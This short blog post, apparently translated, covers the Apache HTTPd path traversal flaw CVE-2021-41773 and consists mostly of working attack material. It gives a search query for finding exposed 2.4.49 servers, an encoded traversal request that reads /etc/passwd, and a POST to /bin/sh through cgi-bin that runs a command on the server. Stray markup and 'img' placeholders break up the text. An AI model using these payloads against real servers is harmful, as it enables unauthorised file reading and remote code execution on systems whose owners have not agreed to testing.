Post

Apache HTTPd path crossing vulnerability CVE-2021-41773

Posted
By Rhy0z
1 min read
Apache HTTPd path crossing vulnerability CVE-2021-41773

Apache HTTPd path crossing vulnerability CVE-2021-41773

Vulnerability Description

Apache HTTPD is an HTTP server that can run PHP web pages through mod_php.

Vulnerability Impact

Apache HTTPd version 2.4.49~2.4.50

Network surveying and mapping

server="Apache/2.4.49" </a-checkbox>

Vulnerability reappears

Get the Apache version through the response package

img

Verify POC

1

/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

img

RCE can be enabled when CGI is turned on

1
2
3

POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
  
B=|id>/tmp/id_txt
This post is licensed under CC BY 4.0 by the author.